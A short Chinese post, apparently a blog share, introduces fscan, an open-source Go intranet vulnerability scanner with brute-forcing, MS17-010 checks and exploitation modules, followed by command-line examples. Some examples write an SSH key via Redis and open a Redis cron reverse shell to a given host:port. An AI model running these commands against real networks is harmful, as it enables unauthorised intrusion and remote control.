分享一个go编写的开源强大的内网综合漏洞扫描工具fscan
fscan 支持全方位的漏扫描,包括但不限于存活探测、端口扫描、各类服务爆破、高危漏洞扫描(如 ms17010)、Web 探测功能(如 webtitle 探测、web 指纹识别、web 漏洞扫描)以及漏洞利用等功能。
用户可以通过简单的命令行参数来使用 fscan,例如指定目标 IP、端口范围、爆破的用户名和密码字典等。
fscan 还支持文件保存、代理设置、线程控制等高级功能。
用法示例:
fscan.exe -h 192.168.1.1/24 (默认使用全部模块) fscan.exe -h 192.168.1.1/16 (B段扫描) fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell) fscan.exe -h 192.168.1.1/24 -c whoam...
点击查看剩余70%
{{collectdata}}
网友评论